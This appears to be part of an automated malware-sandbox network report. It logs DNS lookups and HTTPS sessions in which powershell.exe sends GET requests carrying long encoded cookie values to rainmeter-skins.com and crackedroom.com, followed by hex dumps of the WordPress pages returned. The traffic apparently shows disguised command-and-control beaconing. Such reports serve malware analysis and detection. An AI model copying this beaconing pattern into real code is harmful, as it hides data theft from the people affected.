                                                                                        May 6, 2024 20:43:08.961201906 CEST192.168.2.51.1.1.10x79bStandard query (0)crackedroom.comA (IP address)IN (0x0001)false
                                                                                        May 6, 2024 20:43:10.028700113 CEST192.168.2.51.1.1.10x300eStandard query (0)www.xn--operation-wstenfuchs-zec.deA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        May 6, 2024 20:42:48.588352919 CEST1.1.1.1192.168.2.50xbe7bNo error (0)rainmeter-skins.com50.116.62.225A (IP address)IN (0x0001)false
                                                                                        May 6, 2024 20:43:09.109215021 CEST1.1.1.1192.168.2.50x79bNo error (0)crackedroom.com172.67.208.58A (IP address)IN (0x0001)false
                                                                                        May 6, 2024 20:43:09.109215021 CEST1.1.1.1192.168.2.50x79bNo error (0)crackedroom.com104.21.37.128A (IP address)IN (0x0001)false
                                                                                        May 6, 2024 20:43:10.367945910 CEST1.1.1.1192.168.2.50x300eNo error (0)www.xn--operation-wstenfuchs-zec.de46.38.249.148A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • rainmeter-skins.com
                                                                                        • crackedroom.com
                                                                                        • www.xn--operation-wstenfuchs-zec.de

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.54971150.116.62.2254436776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-06 18:42:48 UTC2346OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                        Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZVDRbsMgDPyV8QP7h6xrtT5U7ZJKeUbESVEAI5uk6cTHz5RtLxMPPvDdcXYTo7NGJ4vhQNrDB3LKSi+DxWHKqtn01+x6nvvPcwDdHNqD2bIyGG5PomFDNj4BMUtJo8eQ1aC5Og3OVeZw91nBFh0SUFYjhjTQWnvHwUFWjnWxOIFHerzs0EcCZlvszuNoDewk6XzFdpGXiHcgvoFzWbUwWU70ELSEZD28Ec7lkw40mVs [TRUNCATED]
                                                                                        Host: rainmeter-skins.com
                                                                                        Connection: Close
                                                                                        2024-05-06 18:42:49 UTC671INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.4.33
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        link: <https://rainmeter-skins.com/wp-json/>; rel="https://api.w.org/"
                                                                                        link: <https://rainmeter-skins.com/wp-json/wp/v2/pages/1214>; rel="alternate"; type="application/json"
                                                                                        link: <https://rainmeter-skins.com/>; rel=shortlink
                                                                                        vary: Accept-Encoding
                                                                                        etag: "30864-1714983762;;;"
                                                                                        x-litespeed-cache: hit
                                                                                        transfer-encoding: chunked
                                                                                        date: Mon, 06 May 2024 18:42:49 GMT
                                                                                        server: LiteSpeed
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-05-06 18:42:49 UTC697INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f
                                                                                        Data Ascii: 10000<!DOCTYPE html>...[if IE 7]><html class="ie ie7" lang="en-US" prefix="og: https://ogp.me/ns#" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"><![endif]-->...[if IE 8]><html class="ie ie8" lang="en-US" prefix="og: https://ogp.me/
                                                                                        2024-05-06 18:42:49 UTC14994INData Raw: 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 09 3c 73 74 79 6c 65 3e 2e 74 67 70 6c 69 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6e 69 74 65 64 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 69 6d 67 5b 64 61 74 61 2d 74 67 70 6c 69 2d 69 6d 61 67 65 2d 69 6e 69 74 65 64 5d 20 7b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 3c 2f 73 74 79 6c 65 3e 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 74 67 70 4c 61 7a 79 49 74 65 6d 73 4f 70 74 69 6f 6e
                                                                                        Data Ascii: eter-skins.com/xmlrpc.php"><style>.tgpli-background-inited { background-image: none !important; }img[data-tgpli-image-inited] { display:none !important;visibility:hidden !important; }</style><script type="text/javascript">window.tgpLazyItemsOption
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 67 65 6d 2d 62 75 74 74 6f 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 72 61 69 6e 6d 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 74 68 65 67 65 6d 2d 65 6c 65 6d 65 6e 74 73 2d 65 6c 65 6d 65 6e 74 6f 72 2f 69 6e 63 2f 65 6c 65 6d 65 6e 74 6f 72 2f 77 69 64 67 65 74 73 2f 62 75 74 74 6f 6e 2f 61 73 73 65 74 73 2f 63 73 73 2f 74 68 65 67 65 6d 2d 62 75 74 74 6f 6e 2e 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c
                                                                                        Data Ascii: text/css' media='all' /><link rel='stylesheet' id='thegem-button-css' href='https://rainmeter-skins.com/wp-content/plugins/thegem-elements-elementor/inc/elementor/widgets/button/assets/css/thegem-button.css' type='text/css' media='all' /><link rel='styl
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 6f 64 2d 65 78 74 65 72 6e 61 6c 2c 20 67 6f 6f 67 6c 65 5f 66 6f 6e 74 2d 65 6e 61 62 6c 65 64 2c 20 66 6f 6e 74 5f 64 69 73 70 6c 61 79 2d 61 75 74 6f 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 2e 72 65 63 65 6e 74 63 6f 6d 6d 65 6e 74 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 69 6e 6d 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 31 2f 72 6d 73 6b 69 6e
                                                                                        Data Ascii: od-external, google_font-enabled, font_display-auto"><style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><link rel="icon" href="https://rainmeter-skins.com/wp-content/uploads/2021/11/rmskin
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 64 74 68 2d 61 75 74 6f 20 66 6c 65 78 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 61 6c 69 67 6e 2d 64 65 66 61 75 6c 74 20 66 6c 65 78 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 61 6c 69 67 6e 2d 74 61 62 6c 65 74 2d 64 65 66 61 75 6c 74 20 66 6c 65 78 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 61 6c 69 67 6e 2d 6d 6f 62 69 6c 65 2d 64 65 66 61 75 6c 74 20 66 6c 65 78 2d 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 2d 64 65 66 61 75 6c 74 20 66 6c 65 78 2d 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 2d 74 61 62 6c 65 74 2d 64 65 66 61 75 6c 74 20 66 6c 65 78 2d 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 2d 6d 6f 62 69 6c 65 2d 64 65 66 61 75 6c 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 6e 76 69 73 69 62 6c 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74
                                                                                        Data Ascii: dth-auto flex-horizontal-align-default flex-horizontal-align-tablet-default flex-horizontal-align-mobile-default flex-vertical-align-default flex-vertical-align-tablet-default flex-vertical-align-mobile-default elementor-invisible elementor-widget element
                                                                                        2024-05-06 18:42:49 UTC702INData Raw: 2f 32 30 31 38 2f 31 32 2f 6d 6f 6e 64 2d 72 61 69 6e 6d 65 74 65 72 2d 74 68 65 6d 65 2d 74 68 65 67 65 6d 2d 70 72 6f 64 75 63 74 2d 6a 75 73 74 69 66 69 65 64 2d 73 71 75 61 72 65 2d 6c 2e 6a 70 67 20 31 78 2c 20 68 74 74 70 73 3a 2f 2f 72 61 69 6e 6d 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 38 2f 31 32 2f 6d 6f 6e 64 2d 72 61 69 6e 6d 65 74 65 72 2d 74 68 65 6d 65 2d 74 68 65 67 65 6d 2d 70 72 6f 64 75 63 74 2d 6a 75 73 74 69 66 69 65 64 2d 73 71 75 61 72 65 2d 64 6f 75 62 6c 65 2d 6c 2e 6a 70 67 20 32 78 22 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 32 70 78 29 22 20 73 69 7a 65 73 3d 22 31 30 30 76 77 22 3e 20 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22
                                                                                        Data Ascii: /2018/12/mond-rainmeter-theme-thegem-product-justified-square-l.jpg 1x, https://rainmeter-skins.com/wp-content/uploads/2018/12/mond-rainmeter-theme-thegem-product-justified-square-double-l.jpg 2x" media="(max-width: 992px)" sizes="100vw"> <source srcset="
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 31 30 30 30 30 0d 0a 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 38 2f 31 32 2f 6d 6f 6e 64 2d 72 61 69 6e 6d 65 74 65 72 2d 74 68 65 6d 65 2e 6a 70 67 20 32 78 22 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 22 20 20 73 69 7a 65 73 3d 22 31 30 30 76 77 22 3e 0a 09 09 09 09 09 09 09 09 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 72 61 69 6e 6d 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 38 2f 31 32 2f 6d 6f 6e 64 2d 72 61 69 6e 6d 65 74 65 72 2d 74 68 65 6d 65 2d 74 68 65 67 65 6d 2d 70 72 6f 64 75 63 74 2d 6a 75 73 74 69 66 69 65 64 2d 73 71 75 61 72 65 2d 6c 2e 6a 70 67 20 31 78 2c 20 68 74 74 70 73 3a 2f 2f 72 61 69
                                                                                        Data Ascii: 10000ontent/uploads/2018/12/mond-rainmeter-theme.jpg 2x" media="(max-width: 767px)" sizes="100vw"><source srcset="https://rainmeter-skins.com/wp-content/uploads/2018/12/mond-rainmeter-theme-thegem-product-justified-square-l.jpg 1x, https://rai
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 2e 63 6f 6d 2f 73 75 62 6d 69 74 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 72 61 69 6e 6d 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 25 32 46 73 6b 69 6e 73 25 32 46 72 65 61 6c 69 73 74 69 63 2d 77 65 61 74 68 65 72 2d 66 6f 72 65 63 61 73 74 2d 34 25 32 46 26 23 30 33 38 3b 74 69 74 6c 65 3d 52 65 61 6c 69 73 74 69 63 2b 57 65 61 74 68 65 72 2b 46 6f 72 65 63 61 73 74 2b 34 22 20 74 69 74 6c 65 3d 22 52 65 64 64 69 74 22 3e 3c 69 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 73 2d 69 74 65 6d 2d 69 63 6f 6e 20 72 65 64 64 69 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09
                                                                                        Data Ascii: "_blank" href="https://www.reddit.com/submit?url=https%3A%2F%2Frainmeter-skins.com%2Fskins%2Frealistic-weather-forecast-4%2F&#038;title=Realistic+Weather+Forecast+4" title="Reddit"><i class="socials-item-icon reddit"></i></a></div></div>
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 72 61 69 6e 6d 65 74 65 72 2d 73 6b 69 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 32 2f 44 65 73 6b 74 6f 70 2d 56 55 2d 4d 65 74 65 72 2d 56 53 54 2d 65 64 69 74 69 6f 6e 2d 74 68 65 67 65 6d 2d 70 72 6f 64 75 63 74 2d 6a 75 73 74 69 66 69 65 64 2d 73 71 75 61 72 65 2d 6c 2e 6a 70 67 22 20 77 69 64 74 68 3d 22 35 30 30 22 20 68 65 69 67 68 74 3d 22 35 30 30 22 20 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 74 68 65 67 65 6d 2d 70 72 6f 64 75 63 74 2d 6a 75 73 74 69 66 69 65 64 2d 73 71 75 61 72 65 2d 6c 22 20 61 6c 74 3d 22 44 65 73 6b 74 6f 70 20 56 55 2d 4d 65 74 65 72 20 26 23 38 32 31 31 3b 20 56 53 54 20 65 64 69 74 69
                                                                                        Data Ascii: ="async" src="https://rainmeter-skins.com/wp-content/uploads/2023/02/Desktop-VU-Meter-VST-edition-thegem-product-justified-square-l.jpg" width="500" height="500" class="attachment-thegem-product-justified-square-l" alt="Desktop VU-Meter &#8211; VST editi
                                                                                        2024-05-06 18:42:49 UTC16384INData Raw: 09 09 09 09 09 09 09 09 09 09 52 65 66 6c 65 63 74 20 53 6f 75 6e 64 20 56 69 73 75 20 31 2e 31 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76
                                                                                        Data Ascii: Reflect Sound Visu 1.1</span></div><div class="description"></div></div></div></div></div></div


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549712172.67.208.584433852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-06 18:43:09 UTC2338OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                        Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZZBBbsMgEEWvUi7QO7hpomYRJbUjeY3w2EEGBs2MHafi8IXQdlOxmA/8efyhidFZo8ViOJD28IEsSellsDhMSTWb/ppdz3P/eQ6gm0N7MFtSBsPtaTRsyManIOZcZPQYkho0V9LgXHUOd58UbNEhASU1YpCB1np3HBwk5VgXxAk80uNlhz4SMNuCO4+jNbDLSecrtks+iXgH4hs4l1QLk2WhR1ZLEOvhjXAuj3Sgydy [TRUNCATED]
                                                                                        Host: crackedroom.com
                                                                                        Connection: Close
                                                                                        2024-05-06 18:43:11 UTC1185INHTTP/1.1 200 OK
                                                                                        Date: Mon, 06 May 2024 18:43:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        link: <https://crackedroom.com/wp-json/>; rel="https://api.w.org/", <https://wp.me/bqv9m>; rel=shortlink
                                                                                        x-litespeed-tag: 191_HTTP.200,191_PGSRP
                                                                                        vary: Accept-Encoding
                                                                                        set-cookie: bp_user-role=guest; expires=Wed, 13-Jan-2038 18:43:10 GMT; Max-Age=432000000; path=/
                                                                                        set-cookie: bp_user-registered=0; expires=Wed, 13-Jan-2038 18:43:10 GMT; Max-Age=432000000; path=/
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        referrer-policy: same-origin
                                                                                        permissions-policy: interest-cohort=()
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        x-xss-protection: 1;mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FV414YdaRlR4SLPwlsjkmP3h75NMpEPJjNcBGDfhsvcLjOt7ms%2BLFbW%2FIto8JmGRDRvqeVl3aTxZ0U5Pb%2B70hlqYoFZ3eNtQbmD0TtO6%2FMw5IpW%2BLRJdrqMBI%2FyaQvjZyw0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 87fb1d418f61a674-MIA
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-05-06 18:43:11 UTC184INData Raw: 37 62 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 0a 0a 3c 68 65 61 64 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 53 69 74 65 22 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63
                                                                                        Data Ascii: 7b0e<!DOCTYPE html><html lang="en-GB"><head itemscope itemtype="http://schema.org/WebSite"><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-sc
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 72 61 63 6b 65 64 72 6f 6f 6d 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c 20 6d 61 78 2d 76 69 64 65 6f 2d 70 72 65 76 69 65 77 3a 2d 31 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69
                                                                                        Data Ascii: ale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://crackedroom.com/xmlrpc.php"><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site i
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 63 72 61 63 6b 65 64 72 6f 6f 6d 2e 63 6f 6d 2f 23 62 72 65 61 64 63 72 75 6d 62 22 2c 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4c 69 73 74 49 74 65 6d 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 31 2c 22 6e 61 6d 65 22 3a 22 48 6f 6d 65 22 7d 5d 7d 2c 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 63 72 61 63 6b 65 64 72 6f 6f 6d 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 72 61 63 6b 65 64 72 6f 6f 6d 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 43 72 61 63 6b 65 64 20 52 4f 4f 4d 22 2c 22 64 65 73 63
                                                                                        Data Ascii: ype":"BreadcrumbList","@id":"https://crackedroom.com/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home"}]},{"@type":"WebSite","@id":"https://crackedroom.com/#website","url":"https://crackedroom.com/","name":"Cracked ROOM","desc
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 72 61 63 6b 65 64 72 6f 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61
                                                                                        Data Ascii: \/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/crackedroom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).va
